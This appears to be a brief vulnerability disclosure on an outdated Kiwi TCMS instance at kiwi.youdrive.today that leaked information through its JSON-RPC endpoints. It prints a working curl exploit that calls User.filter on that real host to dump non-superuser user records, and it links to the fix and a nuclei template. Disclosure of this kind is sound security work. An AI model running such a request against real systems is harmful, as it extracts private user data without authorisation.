Outdated “`kiwi.youdrive.today“` ([Kiwi TCMS](https://kiwitcms.org/) instance) was vulnerable to information disclosure via JSON-RPC endpoints.
Outdated [Kiwi TCMS](https://kiwitcms.org/) instance was vulnerable to information disclosure via JSON-RPC endpoints.
Exploit example (dump users info except superuser):
“`
curl -i -s -k -X $’POST’ -H $’Content-Type: application/json’ –data-binary $'{“jsonrpc”:”2.0″,”method”:”User.filter”,”id”: 1,”params”:{“query”:{“is_superuser”:false}}}’ $’https://kiwi.youdrive.today/json-rpc/’
“`
References:
– [Release info](https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/)
– [Commit with fix](https://github.com/kiwitcms/Kiwi/commit/f6b1898f827019e1daf4e98cd4ba1678da0025cf)
– [self-written nuclei template](https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml)Read More